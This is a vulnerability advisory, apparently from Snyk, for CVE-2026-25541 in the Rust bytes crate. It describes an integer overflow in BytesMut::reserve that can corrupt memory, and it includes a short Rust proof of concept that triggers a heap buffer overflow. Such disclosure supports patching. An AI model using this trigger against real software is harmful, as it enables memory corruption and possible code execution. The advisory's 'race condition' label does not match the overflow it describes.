Race Condition Affecting bytes package, versions >=1.2.1 <1.11.1
Threat Intelligence
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk IDSNYK-RUST-BYTES-15191460
- published3 Feb 2026
- disclosed3 Feb 2026
- creditksj1230
Introduced: 3 Feb 2026
CVE-2026-25541 (opens in a new tab)How to fix?
Upgrade bytes to version 1.11.1 or higher.
Overview
bytes is an A utility library for working with bytes.
Affected versions of this package are vulnerable to Race Condition via the BytesMut::reserve function. An attacker can cause memory corruption and potentially execute arbitrary code or trigger undefined behavior by supplying crafted input values that result in integer overflow during memory allocation calculations.
Note: This is only exploitable if integer overflow checks are configured to wrap instead of panic.
PoC
use bytes::*;
fn main() {
let mut a = BytesMut::from(&b"hello world"[..]);
let mut b = a.split_off(5);
// Ensure b becomes the unique owner of the backing storage
drop(a);
// Trigger overflow in new_cap + offset inside reserve
b.reserve(usize::MAX - 6);
// This call relies on the corrupted cap and may cause UB & HBO
b.put_u8(b'h');
}